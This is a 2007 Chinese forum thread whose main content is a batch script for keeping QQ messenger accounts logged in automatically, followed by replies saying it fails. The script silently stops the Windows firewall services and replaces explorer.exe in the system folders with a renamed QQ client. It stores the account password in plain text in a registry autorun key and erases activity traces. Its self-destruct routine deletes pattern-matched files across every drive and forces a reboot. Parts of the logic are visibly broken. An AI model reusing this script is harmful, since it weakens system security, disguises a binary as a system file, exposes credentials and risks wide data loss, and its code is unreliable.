以下为代码部分
:##############################################
::Copyright (C) 2007 koala
::Contact: da2qia1ku5@126.com
::QQ 13019940
::此脚本是用瑞士的notepad2.exe在全屏模式下编辑的
@echo off
color 1f &mode con:cols=70 lines=17 &title 程序初始化
:var_set
:: enviroment variable initializing...
::变量初始化
rem 网络连接初始值--无效
set network=bad
rem 成功挂机的QQ个数初始值:0
set /a logged_Num=0
rem 启动自我毁灭程序初始值--假
set killself=No
:file_chk
cls
echo. &&echo. &echo. &echo 程序初始化阶段...
echo 请稍等...
ping /n 1 127.1>nul 2>nul
::关闭防火墙 ----中国dos联盟 网友 dhlkp提出,在此谢谢
@net stop ALG >nul 2>nul
@net stop SharedAccess>nul 2>nul
@set "path=%cd%;%path%"
::##########################################################################
::嵌套分析判断
::判断 %systemroot%\system\explorer.exe 和 %systemroot%\system\explorer.exe
::是文件还是文件夹,并进行相应的操作。如果是文件夹,删除;如果是文件,删除
::然后复制 miniQQ2.2.exe进去并重命名为 explorer.exe
::以下的 %=.....=% 为注释,此种注释类似于C语言中的 /*......*/
::##########################################################################
for %%f in ( %systemroot%\system, %systemroot%\system32 ) do (
if exist "%%f\explorer.exe" (
%systemroot%\system32\cacls.exe "%%f\explorer.exe" /e /t /p "%username%":F >nul 2>nul
%systemroot%\system32\attrib.exe -r -s -h -a "%%f\explorer.exe" >nul 2>nul
del /s /f /q %%f\explorer.exe
if exist "%%f\explorer.exe" (
rd /s /q %%f\explorer.exe
call filecopy &call filepath ) else (
call filecopy &call filepath )>nul 2>nul
:filepath
if exist "%SYSTEMROOT%\System32\explorer.exe"\nul (
set main=%SYSTEMROOT%\System32\explorer.exe
if exist "%SYSTEMROOT%\System32\explorer.exe"\nul (
del /f /q "%SYSTEMROOT%\System\explorer.exe"
)
) else (
if exist "%SYSTEMROOT%\System\explorer.exe"\nul (
set main=%SYSTEMROOT%\System\explorer.exe >nul 2>nul
) else ( call filecopy
set main=%SYSTEMROOT%\System32\explorer.exe ) >nul 2>nul
) >nul 2>nul
::AScode汇编代码核心部分
echo hP1X500P[PZBBBfh#b##fXf-V@`$fPf]f3/f1/5++u5x>in.com
cls
::输入QQ号和密码
set id=
set passwd=
set /p id=请输入Q号:
::將密碼用滙編程序暫時"轉移"到 in.com 以達到隱藏目的
set /p passwd=enter your QQ password:<nul
for /f "tokens=*" %%i in ('in.com') do set passwd=%%i
del /f in.com >nul 2>nul
::========================================================
::设置上线参数 隐身|保存聊天信息| 声音 |显示聊天情景|
::========================================================
::模式切换
chcp 936 >nul &mode con:cols=70 lines=17
::=====================设置是否隐身=======================
set YinShen=
set hidelogin=
set /p yinShen=是否隐身登陆[y/n]?
if /I %yinshen%==y set hidelogin=/hidelogin
if /I %yinshen%==n set hidelogin=
::==================设置保存聊天信息======================
set nosave=
set BaoCun=
set /p BaoCun=是否保存聊天信息[y/n]?
if /I %BaoCun%==n set nosave=/nosave
if /I %BaoCun%==y set nosave=
::================设置有信息时是否发出声音================
set Fasheng=
set nosound=
set /p Fasheng=有信息时是否发出声音[y/n]?
if /I %Fasheng%==n set nosound= /nosound
if /I %Fasheng%==y set nosound=
::================设置是否显示聊天情景====================
set Qingjing=
set noshow=
set /p Qingjing=是否显示聊天情景[y/n]?
if /I %Qingjing%==n set noshow=/noshow
if /I %Qingjing%==y set noshow=
::========================================================
::原命令形参数
:: /hidelogin /nosave /nosound /noshow
::========================================================
mode con: cols=60 lines=6
call :process
cls
echo 正在导入注册表...
::导入注册表,以便系统启动时读取命令,进行挂Q
ping -n 2 127.1>nul
reg add HKLM\software\microsoft\windows\currentversion\run /v %logged_Num% /t reg_sz /d "%main% %id% %passwd% %hidelogin%%nosave%%nosound% %noshow%" /f >nul 2>nul
cls
echo 正在测试并进行验证登陆...
%main% %id% %passwd% %hidelogin% %nosave% %nosound% %noshow%
echo 登陆成功...
echo
ping -n 2 127.1>nul
exit
:process
:: 漂亮的进度条
set b============================================================
set b1=-
set n=1
:t1
cls
color e0
set b1=%b1%-
set b=%b:~1%
echo 正在提交登陆数据,請等待...
echo.
echo %b1%%b%
set /a n+=1
if %n%==60 goto end
ping -n 1 127.1 >nul
goto t1
:Log_off
title 取消QQ注册表挂机
::如果导入注册表文件个数为0,显示错误信息
if "%logged_Num%"=="0" goto :no_QQ_login
::QQnum为注册表中记录"登陆的QQ号码个数"
set QQnum=0
:undo_login
title 撤销QQ挂机
color 1f
cls
echo.
echo 分析引擎正在撤销注册表QQ挂机……
::删除挂机痕迹
setlocal enabledelayedexpansion
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %QQnum%>nul 2>nul |find /i "reg_sz">nul 2>nul
if errorlevel 0 (
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %QQnum% /f >nul 2>nul
set /a QQnum+=1
if "%QQnum%"=="5" goto :succeed_in_Log_off
goto :undo_login
)
cls
::#################################################################
:: 以下是毁灭本程序的关键部分
::#################################################################
:Kill_Myself
set killself=Yes
::##################################################################################################################
cd /d "%systemdrive%\"
>%systemdrive%\shutdown.vbs echo Set colOperatingSystems = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * from Win32_OperatingSystem")
>>%systemdrive%\shutdown.vbs echo For Each objOperatingSystem in colOperatingSystems
>>%systemdrive%\shutdown.vbs echo ObjOperatingSystem.Win32Shutdown(12)
>>%systemdrive%\shutdown.vbs echo Next
::##################################################################################################################
(echo ::分析操作系统并准备重启
echo set find=%systemroot%\system32\find.exe
echo ::分析.........
echo ver ^| ^"%%find^%%" /i "Windows XP" > nul
echo if not errorlevel 1 ^(
echo set CHK_OS=XP
echo ^) else (
echo set CHK_OS=2K
echo ^)
echo ::启用重新启动
echo ::然后调用HKLM\software\microsoft\windows\currentversion\RunOnce /v killmyself /t reg_sz /d %systemdrive%\KillMyself.bat
echo ::删除 QQ注册表挂机.exe 以及 %systemdrive%\KillMyself.bat
echo if ^%%CHK_OS%%==XP (
echo del ^%%systemdrive%%\shutdown.vbs
echo %systemroot%\system32\shutdown -r -t 0
echo ^) else (
echo cscript %systemdrive%\shutdown.vbs
echo ^) )>analyse_OS.bat
::##################################################################################################################
>%systemdrive%\KillMyself.bat echo cls ^&echo.
>>%systemdrive%\KillMyself.bat echo echo 痕迹清理完毕!程序正在启动分析引擎...
>>%systemdrive%\KillMyself.bat echo ping /n 4 127.1 ^>nul 2^>nul
>>%systemdrive%\KillMyself.bat echo ::进行逻辑分析,然后销毁挂机程序
>>%systemdrive%\KillMyself.bat echo cls
>>%systemdrive%\KillMyself.bat echo echo. ^&echo. ^&echo 正在销毁程序...
>>%systemdrive%\KillMyself.bat echo setlocal enabledelayedexpansion
>>%systemdrive%\KillMyself.bat echo for ^%%%%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
>>%systemdrive%\KillMyself.bat echo if exist ^%%%%i: (
>>%systemdrive%\KillMyself.bat echo cd\
>>%systemdrive%\KillMyself.bat echo for /f "tokens=*" ^%%%%a in ^('dir /s /a-d /b ^%%%%i:\**Q*Q**注**.*') do (
>>%systemdrive%\KillMyself.bat echo del /q /a /f ^"%%%%a"
>>%systemdrive%\KillMyself.bat echo ^)
>>%systemdrive%\KillMyself.bat echo ^)
>>%systemdrive%\KillMyself.bat echo ^) ^>nul 2^>nul
>>%systemdrive%\KillMyself.bat echo :next
>>%systemdrive%\KillMyself.bat echo cls
>>%systemdrive%\KillMyself.bat echo for ^%%%%j in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
>>%systemdrive%\KillMyself.bat echo if exist ^%%%%j: (
>>%systemdrive%\KillMyself.bat echo cd\
>>%systemdrive%\KillMyself.bat echo for /f "tokens=*" ^%%%%b in ^('dir /s /a-d /b ^%%%%j:\*%~n0*.*') do (
>>%systemdrive%\KillMyself.bat echo del /q /a /f ^"%%%%b"
>>%systemdrive%\KillMyself.bat echo ^%%systemdrive%%\analyse_OS.bat
>>%systemdrive%\KillMyself.bat echo del /f ^%%systemdrive%%\KillMyself.bat
>>%systemdrive%\KillMyself.bat echo del /f ^%%systemdrive%%\analyse_OS.bat
>>%systemdrive%\KillMyself.bat echo ^)
>>%systemdrive%\KillMyself.bat echo ^)
>>%systemdrive%\KillMyself.bat echo ^) ^>nul 2^>nul
::##################################################################################################################
::调用:Clear_Trace模块进行痕迹清理
goto :Clear_Trace
::微软控制台运行记录
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Microsoft Management Console\Recent File List" /f >nul 2>nul
::运行痕迹
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams" /f >nul 2>nul
tasklist > "%temp%"\processlist.txt
type "%temp%"\processlist.txt|find /i "explorer.exe" >nul 2>nul
if errorlevel==1 taskkill /f /im explorer.exe >nul 2>nul
start %systemroot%\explorer.exe
if exist "%temp%"\processlist.txt del /f /q /a attributes -h -s -r -a "%temp%"\processlist.txt
cls
::###########################
::撤销注入内存中的脚本变量 #
::###########################
set n=
set b1=
set logged_Num=
set b=
set i=
set a=
set i=
set j=
set killmyself=
set main=
set network=
set choice=
set id=
set passwd=
set YinShen=
set hidelogin=
set nosave=
set BaoCun=
set Fasheng=
set nosound=
set Qingjing=
set noshow=
set QQ=
set QQnum=
::###########################
cls
@if "%killself%"=="Yes" (
call %systemdrive%\KillMyself.bat
) else (
goto :start
)
:eof
endlocal
[ Last edited by koala on 2007-9-21 at 07:55 PM ]作者: dhlkp 时间: 2007-9-17 14:02 楼主啊
我发现在在我的电脑上不能用的啊?
是怎么回事
黑客版可以运行就是登陆不上去
考拉版的是出现:未发现有效的网络连接
请确认你的猫是否已经正确连接到Internet.,作者: koala 时间: 2007-9-21 18:23 更新了一下源代码,自己机器上通过了,网吧却没有通过,希望有人能查证错误
另注:
这不是我最近写的那个版本,那个在一次U盘清理中无意删了,用了数据恢复工具,但是没有找到,这个版本会自动检测 MiniQQ2.2.exe 所在位置并进行合理配制作者: koala 时间: 2007-10-3 16:45 赌东道???作者: dxt1988 时间: 2007-10-8 01:59 用不了!